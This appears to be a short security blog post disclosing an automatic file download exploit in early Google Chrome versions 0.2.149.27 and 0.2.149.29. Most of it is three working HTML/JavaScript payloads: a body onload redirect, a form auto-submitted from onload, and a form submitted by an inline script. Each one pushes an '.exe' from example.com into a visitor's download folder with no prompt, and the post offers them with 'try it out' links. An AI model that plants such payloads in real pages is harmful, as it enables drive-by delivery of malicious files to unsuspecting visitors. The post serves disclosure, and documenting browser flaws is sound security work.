Google Chrome Automatic File Download Exploit Part Two

Adding to where we left off with the first automatic file download exploit, there have been a few advances which allow the same effect to occur in newer versions of Google Chrome. Rather than utilizing an iframe or script tag to perform an automatic download like its predecesors, this exploit does it through the body and form tags with using a bit of javascript.

Using the body tag [try it out] <body onload="document.location='http://example.com/path/to/file.exe'">

Using form & body tags [try it out]


    <body onload="document.download.submit()">

    <form name="download" action="http://example.com/path/to/file.exe">

    </body>

Using a form tag [try it out]


        <form name="download" action="http://example.com/path/to/file.exe">

        <script>document.download.submit();</script>

All of these will function flawlessly and send the malicious file to the user's download folder as long as the user has Chrome set to not prompt during file download (which is the default). Also, special thanks to mustlive for finding these.

Affected Versions
0.2.149.27
0.2.149.29

References
http://websecurity.com.ua/2423/

Permalink: Google Chrome Automatic File Download Exploit Part Two (bookmark@delicious)